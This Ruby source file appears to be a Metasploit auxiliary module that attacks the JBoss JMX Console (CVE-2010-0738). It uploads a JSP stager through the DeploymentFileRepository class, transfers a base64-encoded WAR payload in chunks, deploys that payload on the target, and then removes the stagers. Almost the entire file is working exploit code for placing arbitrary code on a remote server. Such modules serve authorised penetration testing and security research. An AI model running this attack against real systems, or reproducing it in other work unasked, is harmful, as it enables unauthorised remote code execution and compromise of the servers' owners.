1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HTTP::JBoss
8

9
  def initialize
10
    super(
11
      'Name' => 'JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment',
12
      'Description' => %q{
13
        This module uses the DeploymentFileRepository class in the JBoss Application Server
14
        to deploy a JSP file which then deploys an arbitrary WAR file.
15
      },
16
      'Author' => [
17
        'us3r777 <us3r777[at]n0b0.so>'
18
      ],
19
      'References' => [
20
        [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
21
        [ 'OSVDB', '64171' ],
22
        [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],
23
        [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]
24
      ],
25
      'Actions' => [
26
        ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],
27
        ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]
28
      ],
29
      'DefaultAction' => 'Deploy',
30
      'License' => BSD_LICENSE,
31
      'Notes' => {
32
        'Stability' => [CRASH_SAFE],
33
        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK],
34
        'Reliability' => []
35
      }
36
    )
37

38
    register_options(
39
      [
40
        Opt::RPORT(8080),
41
        OptString.new('APPBASE', [ true, 'Application base name', 'payload']),
42
        OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])
43
      ]
44
    )
45
  end
46

47
  def deploy_action(app_base, war_data)
48
    stager_base = Rex::Text.rand_text_alpha(rand(8..15))
49
    stager_jsp_name = Rex::Text.rand_text_alpha(rand(8..15))
50
    encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
51
    stager_contents = stager_jsp_with_payload(app_base, encoded_payload)
52

53
    if http_verb == 'POST'
54
      print_status('Deploying stager for the WAR file...')
55
      res = upload_file(stager_base, stager_jsp_name, stager_contents)
56
    else
57
      print_status('Deploying minimal stager to upload the payload...')
58
      head_stager_jsp_name = Rex::Text.rand_text_alpha(rand(8..15))
59
      head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name)
60
      head_stager_uri = '/' + stager_base + '/' + head_stager_jsp_name + '.jsp'
61
      res = upload_file(stager_base, head_stager_jsp_name, head_stager_contents)
62

63
      # We split the stager_jsp_code in multiple junks and transfer on the
64
      # target with multiple requests
65
      current_pos = 0
66
      while current_pos < stager_contents.length
67
        next_pos = current_pos + 5000 + rand(100)
68
        vars_get = { 'arg0' => stager_contents[current_pos, next_pos] }
69
        print_status("Uploading second stager (#{current_pos}/#{stager_contents.length})")
70
        res = deploy('uri' => head_stager_uri,
71
                     'vars_get' => vars_get)
72
        current_pos += next_pos
73
      end
74
    end
75

76
    # Using HEAD may trigger a 500 Internal Server Error (at least on 4.2.3.GA),
77
    # but the file still gets written.
78
    unless res && (res.code == 200 || res.code == 500)
79
      fail_with(Failure::Unknown, 'Failed to deploy')
80
    end
81

82
    print_status('Calling stager to deploy the payload warfile (might take some time)')
83
    stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
84
    deploy('uri' => stager_uri,
85
           'method' => 'GET')
86

87
    if res && res.code == 200
88
      print_good('Payload deployed')
89
    else
90
      print_error('Failed to deploy final payload')
91
    end
92

93
    # Cleaning stagers
94
    print_status('Undeploying stagers via DeploymentFileRepository.remove()...')
95
    print_status('This might take some time, be patient...') if http_verb == 'HEAD'
96
    delete_res = []
97
    if head_stager_jsp_name
98
      delete_res << delete_file(stager_base + '.war', head_stager_jsp_name, '.jsp')
99
    end
100
    delete_res << delete_file(stager_base + '.war', stager_jsp_name, '.jsp')
101
    delete_res << delete_file('./', stager_base + '.war', '')
102
    delete_res.each do |r|
103
      if !r
104
        print_warning('Unable to remove WAR [No Response]')
105
      elsif r.code < 200 || r.code >= 300
106
        print_warning("WARNING: Unable to remove WAR [#{r.code} #{r.message}]")
107
      end
108
    end
109
  end
110

111
  # Undeploy the WAR and the stager if needed
112
  def undeploy_action(app_base)
113
    print_status("Undeploying #{app_base} via DeploymentFileRepository.remove()...")
114
    print_status('This might take some time, be patient...') if http_verb == 'HEAD'
115
    res = delete_file('./', app_base + '.war', '')
116

117
    unless res
118
      print_error('Unable to remove WAR (no response)')
119
      return
120
    end
121

122
    if res.code < 200 || res.code >= 300
123
      print_error("Unable to remove WAR [#{res.code} #{res.message}]")
124
    else
125
      print_good('Successfully removed')
126
    end
127
  end
128

129
  def run
130
    app_base = datastore['APPBASE']
131

132
    case action.name
133
    when 'Deploy'
134
      unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])
135
        fail_with(Failure::BadConfig, 'Unable to open WARFILE')
136
      end
137
      war_data = File.read(datastore['WARFILE'], mode: 'rb')
138
      deploy_action(app_base, war_data)
139
    when 'Undeploy'
140
      undeploy_action(app_base)
141
    end
142
  end
143
end
144

145